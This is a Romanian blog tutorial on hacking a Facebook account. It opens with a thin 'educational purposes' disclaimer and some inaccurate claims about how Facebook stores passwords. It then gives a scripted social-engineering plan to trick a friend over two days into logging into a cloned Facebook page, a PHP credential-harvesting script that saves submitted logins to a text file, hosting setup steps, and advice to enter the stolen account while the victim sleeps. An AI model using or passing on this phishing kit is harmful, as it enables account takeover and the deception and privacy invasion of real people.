Cum sa spargi un cont de Facebook (2017)

22401

NOTA: Înainte de a începe sa citesti trebuie sa retii faptul ca urmatoarele detalii au scop pur educational. BetIT nu îsi asuma absolut nimic în caz ca informatiile de mai jos sunt folosite pentru diferite daune materiale sau alte lucruri.

Suntem aproape în anul 2017 si sunt foarte sigur ca pâna acum ai fost curios de contul de Facebook al unei anumite persoane. Stim cu toti cum este.

Probabil ai si dat diferite search-uri pe google cu “Programe de spart parole” si alte lucruri de genul asta ce dauneaza sanatatii.

Ei bine, astazi în acest articol te voi ajuta sa întelegi ca acele “programe de spart parole” nu exista si nici nu vor exista prea curând, si tot în acest articol o sa înveti o alternativa ce te poate ajuta cu putin noroc sa faci rost de contul persoanei dorite.

Trebuie sa începem cu începutul…Nu, chiar vorbesc serios. Trebuie sa începem cu începutul ca tu sa-ti poti forma o idee si sa poti sa ma urmaresti pas cu pas în ceea ce urmeaza. Prima data trebuie sa întelegi de ce acele “programe de spart parole” sunt niste porcarii. Pentru asta, trebuie sa stii cum stocheaza Facebook parolele.

Cum stocheaza Facebook parolele?

Facebook nu este atât de tâmpit încât sa stocheze parolele în baza de date în plain text (Sub forma lor normala).
Acestea sunt stocate sub forma de MD5, ceea ce înseamna ca nici Mark Zuckeberg nu este în stare sa-ti afle parola pentru ca ea nu apare în forma ei “originala” în baza lor de date. Acest lucru se numeste “criptare”.

Ca sa întelegi mai bine, uita-te la poza asta:

Pe lânga respectiva forma de criptare se mai adauga si diferite caractere random printre ele, iar atunci se numeste “MD5 Salted”. Este aproape imposibil de “spart” respectivul hash, ci nu pentru ca este “greu” ci pentru ca daca ai încerca sa faci asta cu un procesor normal ar dura ani fiind si posibilitatea sa ajunga la milioane de ani. Deoarece procesul de “spargere” este unul foarte costisitor, procesul de spargere în sine consta în a încerca absolut toate variantele posibile si apoi sa compari acele hash-uri, recunoscut sub forma de „Brute Forcing”.

Desigur, este destul de usor sa gândesti un algoritm ce poate face asta automat, însa cum spuneam nu gândirea este o problema aici ci timpul de executie. Bine, o optiune interesanta pentru spargerea lor ar fi un procesor cuantic dar pâna acolo mai este.

Totu?i, acest proces ar dura milioane de ani asumând ca tu ai facut deja rost de parola victimei în forma criptata pentru ca pâna acolo mai este un drum foarte lung. Una dintre metode ar fi sa te folosesti de o vulnerabilitate, în acest caz cel mai plauzibil ar fi SQL Injection. SQL Injection este o vulnerabilitate ce-ti permite sa rulezi query-ul în baza de date fara a fi logat în aceasta sau a avea acces la ea. Au fost gasite în trecut vulnerabilitati de genul în Facebook. Dar totusi, daca citesti acest articol ma îndoiesc de faptul ca esti în stare sa gasesti o astfel de vulnerabilitate într-un site ce valoreaza miliarde de verzisori.

Sper ca pâna aici ai înteles totul iar pâna în acest punct ai realizat de ce este imposibil sa “spargi” o parola folosind diferite tool-uri.
Totusi, titlul articolului este “Cum sa spargi o parola de Facebook” deci înseamna ca trebuie sa-ti arat o metoda mai putin imposibila si mai mult posibila. Iar pentru asta, o sa te învat Inginerie Sociala.

Ce este Ingineria Sociala?

Propun sa ne oprim putin si sa gândim putin asupra situatiei. Scopul tau ca si atacator este sa faci rost de parola victimei. Care ar fi ceea mai simpla metoda pentru asta?
Teoretic, ceea mai simpla solutie pentru aceasta problema este sa o ceri posesorului. Totusi ar fi cam stupid si atunci nu ar mai avea nici un rost.

Însa, cum ar fi daca ai putea sa o ceri victimei iar aceasta sa ti-o ofere fara sa-si deea seama de asta? Asta suna mai bine!

Haide sa analizam putin definitia Ingineriei Sociale de pe Wikipedia (Definitie la care am contribuit si eu btw.)

„Ingineria sociala (Engleza Social Engineering) este un termen prin care se în?elege arta de a influen?a, de a manipula ?i de a minti. Cu alte cuvinte, este priceperea unor mae?tri în psihologia maselor de a-i face pe al?ii sa gândeasca ?i sa creada ceea ce maestrul vrea ca acei „al?ii” sa creada. Ingineria sociala este un tip de atac psihologic în care atacatorul determina victima sa faca ceva ce el inten?ioneaza sa faca.”

    Acum, poate va gânditi „Pai si cum ma ajuta pe mine asta sa fac rost de o parola?”. Destul de normal sa va gânditi la asta însa propun sa ne aducem putin aminte de marele si regretatul Yahoo.

Acum 3-4 ani sau când se mai folosea el si era în trend, atunci când te înregistrai la Yahoo trebuia sa-ti alegi niste întrebari de securitate alaturi de niste raspunsuri. Acele raspunsuri erau mai apoi folosite în caz ca tu ti-ai uitat parola.

De obicei întrebariile erau „Care a fost numele primului tau câine?” ; „Care este numele mamei tale?”, sau alte lucruri de genul asta.

Era destul de usor, în loc sa pierzi timp încercând sa „spargi” parola victimei, o poti întreba direct acele întrebari într-un mod mai subtil si apoi sa i-o resetezi.

Ce obisnuiam eu sa fac este sa încerc sa „resetez” parola, iar mai apoi Yahoo îmi afisa întrebariile pentru ca eu sa raspund la ele. Mai apoi ma jucam cu victima „Adevar si Provocare” (Destul de stupid). Si folosindu-ma de acest joc faceam rost de raspunsuriile la întrebariile de securitate ca mai apoi sa-i resetez parola. Acesta, este un exemplu de Inginerie Sociala.

    Totusi, Facebook nu are aceste „Întrebari de Securitate” deci pica aceasta varianta, sau…ar putea fi utila în contextul în care esti 100% sigur de faptul ca victima foloseste o adresa de e-mail de la Yahoo. Iar atunci folose?ti ce am povestit mai sus pentru a face rost de adresa de mail si apoi sa-i resetezi parola de la Facebook. Si asta este destul de costisitor si nu promite o rata de succes prea mare, deci avem nevoie de altceva.

Ce este Phishing-ul?

Wikipedia ne da o definitie destul de urâta si anume:

Reprezinta o forma de activitate infrac?ionala care consta în ob?inerea unor date confiden?iale, cum ar fi date de acces pentru aplica?ii de tip bancar, aplica?ii de comer? electronic (ca ebay sau PayPal) sau informa?ii referitoare la carduri de credit, folosind tehnici de manipulare a datelor identita?ii unei persoane sau a unei institu?ii.”

Ce legatura are phishing-ul cu Ingineria Sociala? Pai foarte simplu Ingineria Sociala este folosita în actiuniile de tip Phising.

Noi nu o sa facem absolut nimic nebunesc. În sensul ca nu o sa furam carduri de credit sau alte lucruri de genul asta. Noi o sa ne folosim de Phishing pentru a lua acces la contul de Facebook al victimei. Totusi, ce o sa facem noi este doar un fel de „Phishing” pentru ca metoda este una adaptata si gândita în totalitate de mine. O sa va placa!

Si momentul adevarului…Cum faci rost de o parola de Facebook?

Acum ca ati înteles toate aceste lucruri, restul este joaca de copii. Este momentul sa punem teoria în practica!
O lista cu lucruri de care ai nevoie:
– O poza în care sa apara doua obiecte textile diferite.
– O relatie de prietenie astfel încât sa poti comunica cu victima.

– WebHost si Domeniu. (Le puteti lua gratis, vezi articolul acesta)

Ce o sa se întâmple si la ce am nevoie de ele?

Planul este în felul urmator: Cu o zi înainte tu o sa comunici cu victima si o sa te plângi de faptul ca nu ti se mai deschide galeria pe telefon. (Asumam ca nu ai acces la un PC). Mai apoi, schimbi subiectul si-ti vezi de conversatiile tale normale cu ea.

A 2-a zi o sa comunici din nou cu victima si o sa-i spui urmatorul lucru: „Urmeaza sa ma duc la o întâlnire importanta peste doua ore. Vreau sa-ti dau o poza cu niste haine si sa-mi spui ce ar trebuii sa iau pe mine”. Victima o sa fie destul de încântata de faptul ca tu ai nevoie de o opinie de la ea, în special daca este o fata. O sa considere ca este o persoana importanta pentru tine.

Apoi, dupa ce i-ai spus acest lucru o sa astepti 5 minute. Poti mânca un sandiwch în aceste 5 minute sau ce ai tu chef sa faci. Si o sa-i dai din nou mesaj. „Ah la naiba! Din nou nu se deschide galeria si nu pot sa-ti trimit poza. Stai sa mai încerc odata”. Si iei înca o pauza de doua minute. Ceea ce tocmai i-ai spus pare foare plauzibil deoarece si cu o zi în urma te-ai plâns de faptul ca nu ti se deschide galeria.

Mai departe, trebuie sa te folosesti de acel domeniu si host pe care l-am precizat mai sus si sa faci urmatorul lucru: O sa faci un site ce arata ca frontpage-ul Facebook (Poti da copy/paste). Mai apoi o sa modifici sursa astfel încât sa salveze datele introduse într-un fisier text si apoi sa redirecteze victima catre o pagina ce are acele doua poze. Eu am sa-ti explic doar cum faci site-ul. (vezi mai jos, cum)

Acum, asumând ca ai site-ul pregatit. O sa-i spui victimei: „Tot nu se deschide…o sa o pun pe „numeleSiteuluiCreat”.

Aici ar fi riscul ca victima sa te întrebe „Pai si nu este nevoie sa deschizi galeria pentru asta?” Dar nu se va întâmpla. Victimele sunt stupide în 100% din cazuri si nu se va gândii la asta deoarece nu înseamna prea mult pentru ea.

Mai departe o sa-i dai victimei link-ul de la site-ul tau. Ea se va loga cu intentia sa vada poza, tu o sa-i primesti datele ea o sa vada poza si totul merge perfect. Acum ca ai facut rost de datele ei nu te poti opri, trebuie sa finalizezi atacul astfel încât totul sa para legit si normal.

O sa-i multumesti într-un mod foarte politicos si îi spui ca-i râmâi dator pentru ca a însemnat foarte mult pentru tine. Atentie însa, nu face gresala de a te loga imediat pe contul victimei(Gresala facuta si de mine). Doarece daca aceasta este înca logata, va primii notificare cu faptul ca cineva strain s-a logat pe contul ei. Asteapta si tu pâna când victima doarme si apoi logheaza-te.

Cum fac site-ul despre care vorbesti?

Îti faci cont pe Hostinger, iei un subdomeniu de la ei cu ce nume ai tu chef si cum ai tu chef. Iar mai apoi iei datele FTP ca sa poti sa urci fisiere pe el.
O sa ai nevoie de 2 fisiere importante:

  • index.html
  • post.php

O sa-ti explic acum ce o sa contina fiecare:

Fisierul index.html este de fapt pagina pe care victima ta o va vedea. Poti sa iei un template gratis de pe diferite site-uri si sa le modifici dupa bunul plac folosind niste cunostiinte de baza de HTML si CSS. În acest caz fisierul index.html trebuie sa contina textul de aici: http://pastebin.com/raw/WMfMp6Tg (L-am pus pe PasteBin deoarece este foarte lung)

Iar continutul fisierului post.php trebuie sa fie urmatorul:

<?php

header ('Location: http://UrlLaPozaTa');

$handle = fopen("log.txt", "a");
 <pre>foreach($_POST as $variable => $value) {</pre>
 fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

Atentie: -Trebuie sa modificati prima linie ( header (‘Location: http://UrlLaPozaTa‘); ) Modificati acel url cu un URL ce duce spre poza cu acele haine. Puteti sa puneti poza pe imgur.com si apoi sa copiati url-ul iar mai apoi sa-l puneti acolo. Asta îi va da redirect victimei la poza cu hainele dupa ce si-a introdus datele.
-De asemenea, este foarte important ca cele doua fisiere sa se afle în aceelasi director. Iar fisierul post.php sa aiba permisiuniile setate pe 777

9 COMENTARII

LĂSAȚI UN MESAJ

Please enter your comment!
Please enter your name here